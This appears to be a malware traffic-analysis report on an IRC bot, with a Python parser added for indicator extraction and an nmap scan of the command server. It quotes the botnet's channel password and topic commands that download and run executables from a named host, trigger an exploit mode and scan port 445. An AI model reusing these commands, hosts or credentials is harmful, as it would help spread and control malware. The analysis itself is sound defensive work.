– HTTP Conversations:
  74.52.56.243:80 – [www.viajejapon.com]
    Request: GET /…/sp2eng.txt
    Response: 200 “OK”
    Request: GET /…/LiveProfile.exe
    Response: 200 “OK”
    Request: GET /…/gatex.exe
    Response: 200 “OK”
  72.233.89.198:80 – [whatismyip.com]
    Request: GET /automation/n09230945.asp
    Response: 200 “OK”
– IRC Conversations:
  58.251.59.9:31091
    Nick: user|46
    Username: user|46
    Joined Channel: #simple# with Password syslock
    Channel Topic for Channel #simple#: “! usboff;! killoldones;! dlx www.viajejapon.com/…/gatex.exe;! start liveprofile.exe;! dlx www.viajejapon.com/…/LiveProfile.exe;! exploitmode1;! dl www.viajejapon.com/…/sp2eng.txt;! payload sp2eng.txt;! scanmyrange 445 10”
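An added example, not code from the original report: a small Python parser that splits the #simple# channel topic above into individual bot commands, pulls out the commanded download URLs and the scan directive, and checks each download against the HTTP conversations listed above so that a commanded fetch that never appeared on the wire stands out. The command grammar (commands separated by ";", each beginning with "!", then a verb and space-separated arguments) and the reading of dl/dlx as download verbs are assumptions inferred from this one topic string; the elided path segments are kept exactly as they appear on the page.

```python
"""Parse an IRC-bot channel topic into commands and indicators.

Added example, not code from the original report.  The topic string and the
HTTP requests below are transcribed from the report (elided path segments are
kept as they appear there).  The command grammar is an ASSUMPTION inferred
from this one topic: commands separated by ';', each starting with '!', then
a verb and space-separated arguments.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit

# Channel topic of #simple# as listed in the report.
TOPIC = (
    "! usboff;! killoldones;! dlx www.viajejapon.com/…/gatex.exe;"
    "! start liveprofile.exe;! dlx www.viajejapon.com/…/LiveProfile.exe;"
    "! exploitmode1;! dl www.viajejapon.com/…/sp2eng.txt;"
    "! payload sp2eng.txt;! scanmyrange 445 10"
)

# (host, path) pairs constructed from the report's HTTP conversation list.
HTTP_REQUESTS = [
    ("www.viajejapon.com", "/…/sp2eng.txt"),
    ("www.viajejapon.com", "/…/LiveProfile.exe"),
    ("www.viajejapon.com", "/…/gatex.exe"),
    ("whatismyip.com", "/automation/n09230945.asp"),
]

# Verbs assumed to make the bot fetch a file (the dl/dlx difference is not
# explained on the page).
DOWNLOAD_VERBS = {"dl", "dlx"}


@dataclass(frozen=True)
class BotCommand:
    verb: str
    args: tuple


def parse_topic(topic: str) -> list:
    """Split a topic into BotCommand objects, ignoring fragments without '!'."""
    commands = []
    for chunk in topic.split(";"):
        chunk = chunk.strip()
        if not chunk.startswith("!"):
            continue
        parts = chunk[1:].split()
        if parts:
            commands.append(BotCommand(parts[0].lower(), tuple(parts[1:])))
    return commands


def split_url(url: str) -> tuple:
    """Return (host, path); bot URLs carry no scheme, so one is prepended."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path


def download_urls(commands: list) -> list:
    """URLs the bot is told to fetch, in topic order."""
    return [c.args[0] for c in commands if c.verb in DOWNLOAD_VERBS and c.args]


def correlate_downloads(commands: list, http_requests: list) -> tuple:
    """Split commanded downloads into (fetched, missing) using observed HTTP.

    'fetched' means a GET for the same host and path is in the capture;
    'missing' means the bot was told to download something that never showed
    up on the wire, which deserves a second look in the pcap.
    """
    observed = {(h.lower(), p) for h, p in http_requests}
    fetched, missing = [], []
    for url in download_urls(commands):
        (fetched if split_url(url) in observed else missing).append(url)
    return fetched, missing


def scan_directives(commands: list) -> list:
    """(port, remaining args) from scanmyrange commands; the first argument is
    read as the target port (assumed), the rest is returned untouched."""
    return [(int(c.args[0]), c.args[1:])
            for c in commands if c.verb == "scanmyrange" and c.args]


def indicators(commands: list) -> dict:
    """Hosts and file names worth blocking or hunting for."""
    urls = download_urls(commands)
    return {
        "hosts": sorted({split_url(u)[0] for u in urls}),
        "files": sorted({split_url(u)[1].rsplit("/", 1)[-1] for u in urls}),
    }


if __name__ == "__main__":
    cmds = parse_topic(TOPIC)
    for c in cmds:
        print(f"{c.verb:<12} {' '.join(c.args)}")
    print("fetched/missing:", correlate_downloads(cmds, HTTP_REQUESTS))
    print("scans:", scan_directives(cmds))
    print("indicators:", indicators(cmds))
```

Run as a script it prints the nine commands in topic order, confirms that all three commanded downloads have a matching GET in the HTTP list, and emits the host and file names as indicators; feed it a topic from another channel or an HTTP list from another capture to see which commanded fetches are missing.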
Interesting ports on reverse.gdsz.cncnet.net (58.251.59.9):
Not shown: 1656 closed ports
PORT     STATE    SERVICE        VERSION
15/tcp   open     netstat
21/tcp   open     ftp            vsftpd 2.0.4
22/tcp   open     ssh            OpenSSH 4.2 (protocol 1.99)
111/tcp  open     rpcbind        2 (rpc #100000)
135/tcp  filtered msrpc
137/tcp  filtered netbios-ns
138/tcp  filtered netbios-dgm
139/tcp  filtered netbios-ssn
389/tcp  open     ldap           OpenLDAP 2.2.X
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
631/tcp  open     tcpwrapped
1158/tcp open     http           Oracle Application Server httpd 9.0.4.1.0
1521/tcp open     oracle-tns     Oracle TNS Listener
1720/tcp filtered H.323/Q.931
5001/tcp open     apc-agent      APC PowerChute agent
5060/tcp filtered sip
5520/tcp open     sdlog          Oracle Enterprise Manager
5560/tcp open     http           Oracle Application Server httpd 9.0.4.1.0
5800/tcp filtered vnc-http
6347/tcp open     oracle-tns     Oracle TNS Listener
6667/tcp open     irc            ircu ircd
8009/tcp open     ajp13?
8080/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1